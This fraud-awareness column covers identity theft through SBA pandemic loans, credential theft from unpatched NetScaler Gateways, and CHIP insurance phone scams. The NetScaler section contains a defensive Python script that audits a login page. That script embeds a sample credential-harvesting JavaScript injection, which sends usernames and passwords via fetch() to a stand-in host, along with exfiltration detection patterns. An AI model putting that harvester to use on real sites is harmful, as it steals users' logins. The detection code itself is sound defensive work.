Taking Back the ID

Fraudsters steal pandemic cash in your name, infect business web gateways, and pilfer children’s health insurance money and PII

Date: January 1, 2024

Suzie Johnson recently received a mailed bill that said she had to start paying back a COVID-19 Economic Injury Disaster Loan (EIDL). Suzie was befuddled because she knew nothing about the EIDL program and had never applied for one of its loans. She talked to her federal representative, who advised her to contact the Small Business Administration (SBA) to report the problem. The SBA told her that someone had stolen her identity and used it to apply for the loan in her name. The SBA then canceled the fraudulent loan, and Suzie's problem was resolved. This fictitious case is representative of the recent SBA EIDL and PPP loan scam.

If you’ve received a bill for an SBA Paycheck Protection Program (PPP) or EIDL loan you never applied for, an identity thief probably has stolen your personally identifiable information (PII) to get the government loan in your name.

Here’s what to do to report the scam and initiate the SBA review process to help you resolve any credit problems:

Step 1. Report the identity theft to the Federal Trade Commission (FTC) at IdentityTheft.gov.

  • You’ll receive an FTC identity theft report and a personal recovery plan. Save a copy of your report because you’ll need to submit it to the SBA.
  • Follow the personal recovery plan to stop further misuse of your PII and help repair the damage the identity theft caused.

Step 2. Visit the SBA’s website.

  • Follow the steps to report the identity theft to the SBA, which is required to start the review process.

Step 3. If the identity theft involved a PPP loan and you know the private lender that issued the loan, also contact that lender.

  • Explain that an identity thief used your PII to get the PPP loan without your knowledge or authorization. Tell them the loan is fraudulent.
  • Ask the lender to release you from the loan and to take all the steps needed to remove information about the loan from your credit files and to send you a letter explaining the actions it’s taken.
  • Write down whom you spoke with and when. You may need to contact the lender again.
  • Know that the lender may require a copy of your FTC identity theft report and other documents. The FTC article cited below includes a sample letter that can help you get started.

(See “What to do if you’re billed for an SBA EIDL or PPP loan you don’t owe,” by Rosario Méndez, FTC, Sept. 26, 2023.)

Fraudsters target unpatched NetScaler Gateways to steal users’ credentials

Here’s a warning to all organizations that offer customers all-in-one apps. (Think of apps for your bank or airline on your phone.) Fraudsters are continuing to attack a critical vulnerability, rated 9.8 out of 10, in unpatched NetScaler Gateway appliances, according to an SC Media article. The NetScaler Gateway appliance, sold to organizations, lets customers reach any of the organization’s apps from any device through a single URL, according to Citrix Systems, Inc. It consolidates remote-access infrastructure to give customers single sign-on across all applications, whether they run in a data center, in the cloud or are delivered as SaaS (software as a service), which lets users connect to and use cloud-based apps over the internet. (Common SaaS examples are email, calendaring and office tools, such as Microsoft Office 365.) (See “Attacks on NetScaler Gateways aim for user credentials,” by Steve Zurier, SC Media, Oct. 10, 2023; “NetScaler Gateway,” by Hema Malina, Citrix staff and Subbendu Majumder, NetScaler, Aug. 18, 2023; and “What is SaaS?” Azure, Microsoft.)

The 9.8 rating (out of 10) is a severity score from the Common Vulnerability Scoring System (CVSS); 9.0 and above is “critical,” the top band. The vulnerability itself is cataloged on the Common Vulnerabilities and Exposures (CVE) list, which the nonprofit MITRE Corporation launched in 1999 to give each publicly known vulnerability in software and firmware a unique identifier. CVE is sponsored by the U.S. Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (CISA), of which the U.S. Computer Emergency Readiness Team (US-CERT) is now a part. (See “What is a CVE? Common Vulnerabilities and Exposures Explained,” by Abi Tyas Tunggal, UpGuard, April 6, 2023.)

During an attack, a fraudster first exploits the vulnerability in the unpatched gateway appliance to drop a “web shell” on the appliance itself (not on the customer’s phone or laptop). The attackers used the vulnerability as a “zero day,” meaning they were exploiting it before Citrix had released a patch. With that foothold, they insert a malicious script into the HTML of the gateway’s authentication web page, so that every user who logs in through the gateway unknowingly hands a copy of their username and password to the fraudster. A zero-day attack happens when hackers or other malicious actors take advantage of a software or network vulnerability that’s unknown to the developers, who have, in other words, known about it for zero days. Once the vulnerability is disclosed and a patch is available, attacks on systems that remain unpatched are no longer zero-day attacks, but they work just as well, which is why the SC Media article stresses patching.
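An administrator who wants to check whether a gateway’s login page has been tampered with in the way described above can compare the page against a known-good copy and look for injected script. The following is an added example, not code from this column, from Citrix or from NetScaler. The login-page HTML, the injected script, the host names and the allowed-host list are all constructed for illustration; the pattern list is a heuristic for the common shape of credential-harvesting scripts (hook the form’s submit event, read the password field, send it somewhere with fetch, XMLHttpRequest or an image beacon), not a signature for any specific campaign.

```python
"""Added example: audit a gateway authentication page for injected
credential-stealing script. Not from the article or from Citrix/NetScaler.
All sample HTML, host names and hashes below are constructed."""
import hashlib
import re
from html.parser import HTMLParser
from urllib.parse import urlparse


class ScriptCollector(HTMLParser):
    """Collect <script src=...> sources and the bodies of inline <script> tags."""

    def __init__(self):
        super().__init__()
        self.external = []   # src attribute of every external script
        self.inline = []     # text of every inline script
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            src = dict(attrs).get("src")
            if src:
                self.external.append(src)
            else:
                self._in_script = True
                self._buf = []

    def handle_data(self, data):
        if self._in_script:           # HTMLParser hands script bodies to handle_data
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self.inline.append("".join(self._buf))
            self._in_script = False


# Heuristic markers of a credential harvester: hooks form submission,
# touches the password field, and ships data out of the page.
EXFIL_PATTERNS = [
    r"addEventListener\(\s*['\"]submit['\"]",
    r"\bpasswd\b|\.password\b",
    r"\bfetch\(|XMLHttpRequest|new\s+Image\(",
]


def baseline_hash(html):
    """SHA-256 of the page text, to be recorded from a freshly patched appliance."""
    return hashlib.sha256(html.encode("utf-8")).hexdigest()


def audit_login_page(html, allowed_hosts, known_good_sha256=None):
    """Return a list of findings; an empty list means nothing suspicious was seen."""
    findings = []
    if known_good_sha256 and baseline_hash(html) != known_good_sha256:
        findings.append("page hash differs from the known-good baseline")
    parser = ScriptCollector()
    parser.feed(html)
    for src in parser.external:
        host = urlparse(src).netloc.lower()   # relative paths have no host
        if host and host not in allowed_hosts:
            findings.append(f"external script from unexpected host: {host}")
    for body in parser.inline:
        hits = [p for p in EXFIL_PATTERNS if re.search(p, body)]
        if len(hits) >= 2:   # two of the three markers together is the signal
            findings.append("inline script hooks the login form and sends data out")
    return findings


# Constructed sample: a plain login page, then the same page with an injected
# harvester and a second-stage script pulled from an attacker-controlled host.
CLEAN_PAGE = (
    '<html><body><form id="login"><input name="login">'
    '<input name="passwd" type="password"></form>'
    '<script src="/vpn/js/gateway.js"></script></body></html>'
)
INJECTED_PAGE = CLEAN_PAGE.replace(
    "</body>",
    '<script src="https://collector.invalid/h.js"></script>'
    '<script>document.getElementById("login").addEventListener("submit", function () {'
    ' var u = document.getElementsByName("login")[0].value;'
    ' var p = document.getElementsByName("passwd")[0].value;'
    ' fetch("https://collector.invalid/log?u=" + u + "&p=" + p); });</script></body>',
)

if __name__ == "__main__":
    allowed = {"gateway.example.com"}   # hosts the real page is expected to load from
    good = baseline_hash(CLEAN_PAGE)
    print("clean page:", audit_login_page(CLEAN_PAGE, allowed, good) or "no findings")
    print("injected page:", audit_login_page(INJECTED_PAGE, allowed, good))
```

Run the check from an independent client that fetches the page over the network, not from the appliance itself: a web shell on the gateway could just as easily alter what a local script reads. Record the baseline hash only after the appliance has been patched and inspected, and re-record it after every legitimate update to the login page.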

According to “What are Web Shells?” on the Geeks for Geeks website, “A web shell is a malicious program [or script] that is used to access a web server remotely during cyberattacks … [and] is always used in conjunction with some other technique during the post-exploitation stage.” After a fraudster identifies a vulnerability in a network’s systems or software, they upload a web shell to the compromised server, which gives them a remote foothold from which they can perform discovery on the victim’s Active Directory (AD) and create, delete, modify, download and steal files. AD is the directory service that stores information about user accounts on a Windows network, including password hashes, telephone numbers and other PII, and it lets authorized users and systems on the same network look up that information.

Fraudsters can use stolen PII and other information to commit more fraud or sell it to other malicious actors for fraudulent purposes, including ransomware.

Irfan Asrar, director of threat research at Qualys, and Joseph Carson, chief security scientist and advisory chief information security officer at software company Delinea, provide advice in an SC Media article to protect PII and other valuable information:

  • Once a victim organization has discovered a vulnerability, administrators should immediately patch it and check for any signs of a breach.
  • Employ strong passwords.
  • Ensure strong controls, such as multi-factor authentication and privileged access security, are in place.
  • Never reuse credentials for multiple applications because one compromised account could open the doors to other accounts. (See “Attacks on NetScaler Gateways aim for user credentials,” by Steve Zurier, SC Media, Oct. 10, 2023.)

Children’s health insurance scam

According to the FTC, fraudsters, who are masquerading as officials representing the Medicaid Children’s Health Insurance Program (CHIP), are calling potential victims and asking them for their PII or demanding that they pay to renew their family coverage. Medicaid and CHIP are joint federal/state programs. Each state is responsible for governing all aspects of the administration and operation of its Medicaid and CHIP programs.

The FTC offers advice to protect families from this scam:

  1. CHIP won’t charge you to renew or enroll. CHIP may reach out to you by email, phone or text message to renew your coverage, but it won’t ask you to pay, and it won’t ask for financial information such as your bank account or credit card numbers.
  2. Don’t click on links in text or email messages even if it looks like the message is from your state’s Medicaid agency. That’s a scam. Find your state’s Medicaid agency on Medicaid.gov. Then contact that agency to get more information.
  3. Start at HealthCare.gov to compare insurance plans, coverage and eligibility. The site requires information about your monthly income and age to give you a quote. If anyone or any site asks for your financial information, such as your bank account or credit card number, to get a quote, that’s a scam.
  4. Medical discount plans aren’t medical insurance. (See “Medical Discount Plans and Scams,” FTC.) Scammers often pitch medical discount plans by convincing people they’re the same as insurance — but they’re not. They often just take your money for very little in return.

If you spot a CHIP scam, report it to the FTC at ReportFraud.ftc.gov. (Also, see “Children’s Health Insurance Program: Spot the scam,” by Marissa Hopkins, FTC, Sept. 22, 2023.)

I’m here to help

Please use information about these scams in your outreach programs and among your family members, friends and co-workers.

As part of my outreach program, please contact me if you have any questions on identity theft or cyber-related issues that you need help with or if you’d like me to research a scam and possibly include details in future columns or as feature articles.

I don’t have all the answers, but I’ll do my best to help. I might not get back to you immediately, but I’ll reply. Stay tuned!

Robert E. Holtfreter, Ph.D., CFE, is a distinguished professor of accounting and research at Central Washington University. He’s a member of the Accounting Council for the Gerson Lehrman Group, a research consulting organization, and a member of the White Collar Crime Research Consortium Advisory Council. He’s also the vice president of the ACFE’s Pacific Northwest Chapter and serves on the ACFE Advisory Council and the Editorial Advisory Committee, and he was recently selected to serve on the ACFE’s inaugural CFE Exam Content Development Committee. Holtfreter was the recipient of the Hubbard Award for the best Fraud Magazine feature article in 2016. Contact him at doctorh007@gmail.com.
